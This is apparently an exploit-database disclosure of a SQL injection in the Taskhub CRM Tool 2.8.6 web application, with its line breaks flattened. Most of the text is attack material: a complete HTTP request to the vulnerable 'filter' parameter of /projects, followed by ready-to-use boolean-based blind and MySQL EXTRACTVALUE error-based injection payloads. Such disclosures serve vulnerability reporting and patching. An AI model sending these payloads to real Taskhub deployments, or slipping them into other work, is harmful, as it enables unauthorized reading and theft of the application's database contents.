Taskhub CRM Tool 2.8.6 SQL Injection

# Exploit Title: Taskhub CRM Tool 2.8.6 - SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor:https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###GET /projects?filter=notstarted HTTP/1.1Host: localhostCookie: csrf_cookie_name=a3e6a7d379a3e5f160d72c182ff8a8c8;ci_session=tgu03eoatvsonh7v986g1vj57b8sufh9User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)Gecko/20100101 Firefox/116.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Te: trailersConnection: close### Parameter & Payloads ###Parameter: filter (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: filter=notstarted' AND 2978=2978 AND 'vMQO'='vMQOType: error-basedTitle: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BYclause (EXTRACTVALUE)Payload: filter=notstarted' ANDEXTRACTVALUE(5313,CONCAT(0x5c,0x716a707a71,(SELECT(ELT(5313=5313,1))),0x71787a6b71)) AND 'ronQ'='ronQ